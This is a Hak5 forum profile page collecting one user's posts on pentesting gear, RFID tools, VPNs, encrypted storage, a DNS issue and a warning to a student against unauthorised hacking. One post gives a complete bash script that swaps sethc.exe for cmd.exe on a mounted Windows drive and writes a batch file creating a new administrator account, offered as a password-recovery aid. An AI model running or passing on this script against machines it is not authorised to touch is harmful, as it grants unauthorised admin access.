Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


About Kentj

  • Rank
    Hak5 Fan

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Kentj

    Product buyback?

    Ouch, a pretty tough question. Here's my 2C on that. I can see why H5 wont go for it, for one. It isn't the makers problem if the users / customers have a hard time getting it to work. They provide a hardware platform with a modified OS nothing else. They do provide docs, and try do do support as promised, which is cool. But again. When it comes to getting exploits / scripts to work, thats on "us". It can be a veery bad thing for the buttom line in your books to offer a "Buy back" solution. When do you decide when to buy back ?, from who do you decide to buy back, in what condition ? I have a few things from H5, usually the things I cant get somewhere else, or what suits my projects. I agree they are expensive, but then again, custom gear always is. What matters for me is, I can get a skeleton hardware platform, and a starter OS made for pentesting. If I had to do it myself, starting from scratch, I would be so much more expensive in time and much more frustrating. This is what I pay for, when I buy custom. In that way, H5 haven't failed me one bit. If i have the patience and skills to make it work, it does. As I see it, that's what matters :) Okay, that's my 2C. Beatings welcome (as long as they're verbal ) :D /Kent
  2. Can you Hack a PC over the internet without a user clicking on a link or running a virus? Depends. If there are open ports, running vulnerable services, or through a web driveby targeted at the browser, maybe. But you will have to get code execution one way or the other, if you cant get a virus / payload onto the system, or exploit open port, no. Get on to a domain without knowing the credentials If you can get a foothold on a domain joined system, you dont have to have credentials. They help, and are good to have, but with a good enough exploit collection, credentials doesn't matter. Get Hacked if you are not even connected to the internet without physical access No. If there no connection network, no internet, no radio based keyboard / mouse, and the system have restricted physical access, you're pretty safe. But, that's still a system thats pretty hard to safeguard, and not very userfriendly šŸ˜‰ just some random thoughts šŸ˜‰
  3. Hey :) Yeah, got one from work, and it's a pretty cool piece of toy. But its really not for beginners, so i've got a steep learning curve ahead of me :), as i'm only starting to have a look into the world of RFID, and don't get much time to play with it at work ;), but it's on my to do list ;) I would say, if you're serious about looking into RFID research, a Proxmark is the way to go, and if you know you're going to use it in the field, I would go for a revision 4.01, with the battery option. (from lab401.com) /Kent
  4. I would say, it depends a lot... Are we talking about a vulnerability test, or a penetration test ? Running a scan for vulns, missing patches, or weak passwords are one thing, running a full test, is quite different. And,what is the scope for a test, how "far" are you allowed to go ? When it comes to equipment,a good laptop, running Kali, some Alfa Wireless cards, and you've got the basic gear you'll need. Everything else,is just "nice to have", not "need to have". But for "nice to have". A rubber ducky / Bunny, and a Odroid C2 and some lockpicks šŸ˜„ (and a veeeery patient Boss) /Kent
  5. Kentj

    DNS problem ?

    Hi guys šŸ™‚ Got somewhat of a rookie problem. Rented a new VPS, based on debian 9, and hooked it up to my DNS. My primary site / domain is www.labet.dk, the server is downloads.labet.dk. The strange thing is, if I try to ping it on downloads.labet.dk, I get a response from the right IP, but DNS , it shows up as mail.darrenmusic,com. When I log in, and run a netstat -a, this is the output root@downloads:~# netstat -a Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0* LISTEN tcp 0 0* LISTEN tcp 0 172 mail.darrenmusic.c:2222 80-197-123-156-ca:44938 ESTABLISHED tcp 0 0 mail.darrenmusic.:50180 m2420.contaboserve:http TIME_WAIT tcp6 0 0 [::]:2222 [::]:* LISTEN udp 0 0* Active UNIX domain sockets (servers and established) Proto RefCnt Flags Type State I-Node Path unix 2 [ ] DGRAM 13824 /run/systemd/cgroups-agent unix 2 [ ACC ] STREAM LISTENING 13828 /run/systemd/private unix 2 [ ACC ] STREAM I cant seem to find any services configured to mail.darrenmusic.com, so right now, Im really lost. Any thoughts would be really welcome... Sorry for asking rookie questions šŸ™‚
  6. Kentj

    hack mah school

    Enter stage left, grumpy old man , MUPPET SHOW THEME PLAYING... Young man...listen up, and listen veeeery carefully. Since RKiver gave you the short version, and right now, you're wondering why, I'll give it a try. Since you haven't gotten permission, dont do anything to those machines. just bypassing login restrictions, would be a crime. Launching any kind of exploit, botnet, or malware is a crime. Since you dont know what you're doing, its a real dissaster waiting to happen..period. Go do your learning on a virtual lab, or private lab network, not on your schools gear. But you could try and ask the network staff if you can give them a hand, because you want to learn, and maybe someday be an admin yourself. Some of them might actually think it's cool, and start you in the right direction. Exit stage right, grumpy old man
  7. Or, just boot from a Kali Live system, mount the Windows drive. ------------sethcpatch.sh v2 start-------------- #! /bin/bash # cmd.exe --> sethc.exe copy patch # Target Windows XP - 10, Windows Server 2k, 2k3, 2k8, utestet pƄ Server 2016 # Version 0.2 - Juni 2018 # By kent j <kent@labet.dk> HELP() { echo "Run with patchwin / unpatchwin" } PATCH_WIN () { echo "patching windows sethc function...." sleep 2 mkdir patch cp sethc.exe patch/sethc.bak cp cmd.exe patch/cmd.bak rm sethc.exe cp cmd.exe sethc.exe echo "patching done ......" sleep 2 echo "Writing windows bat file..." cd patch touch useradd.bat echo "net user /add USER PASS" >useradd.bat echo "net localgroup administratorer USER /add" >>useradd.bat cd .. sleep 2 echo "useradd.bat written to c:\windows\system32\patch\useradd.bat" echo "Run with useradd.bat" sleep 2 } UNPATCH_WIN() { echo "unpatch Windows sethc.exe" sleep 2 rm sethc.exe rm cmd.exe cd patch cp sethc.bak ../sethc.exe cp cmd.bak ../cmd.exe cd .. rm -rf patch sleep 2 echo "Cleanup ended !" echo "sethc.exe & cmd.exe back to normal..." echo "Script terminated... " } case $1 in help) HELP ;; patchwin) PATCH_WIN ;; unpatchwin) UNPATCH_WIN ;; esac exit 0 -----------------sethcpatch.sh v2 End------------------ just add this to a custom Kali under /opt/tools/local/win (or whereever you like) Makes your life soo much easier when users are forgettng their passwords :D For use, copy it to the local windrive and run it. When in windows terminal, run the bat file. Log in, and enjoy admin privs :) /Kent
  8. If by doing sshfs you mean, mounting the PS as a harddrive from a workstation using ssh, yep, it can. just make a mount point on the workstation, and mount as usual. sshfs packet_squirrel_ip:/ /mount/point then you can find the PS under /mount/point. If it works the other way around, mounting the workstation as a remote drive on the PS, havent tried that . If the PS have sshfs installed, it should. but using PS as a remote drive does work, so editing payloads, is pretty easy :)
  9. A solution could be to setup your own openVPN server. Isn't that hard to do and it could give you some time to confirm it works as it should. I've testet a private VPN solution based on OpenVPN, from Linux workstations, and see no leaks from it. But, as with any kind of VPN solution, it's possible to sniff the traffik at the gateway, if not encrypted from that point forward. But it should get you through the Chinese firewall. As for phones, hmm. Anything on a GSM network, could possibly be monitored by the government. Something like Jitsi IM and encrypted videochat through VPN comes to mind, depending on your situation. But, as Digininja pointed out, it depends on what resources they want to spend on it, and would they bother for an ordinary bussinessman, conducting legal bussiness in China ? I guess you would be fine, just with an ordinary VPN solution, combined with some kind of encrypted messenger / videocall.
  10. (Taking on the tinfoil hat) Maybe it's just me being paranoid here, but storing confidential data offsite (3rd party provider), and no encryption. No way, no matter who it is. For a small organisation, I would say, privately owned and run server, LUKS drives, and SSHFS, with gpg as an extra layer for individual file encryption. Some realtime monitoring for file read/write (Inotify), and you're on your way :) Depending on the workstations, LUKS and LUKS-Nuke option, maybe try looking into luks-TPM or opengpg smartcards and luks, and you're well on your way to something secure :) (Taking off the tinfoil hat again)
  • Create New...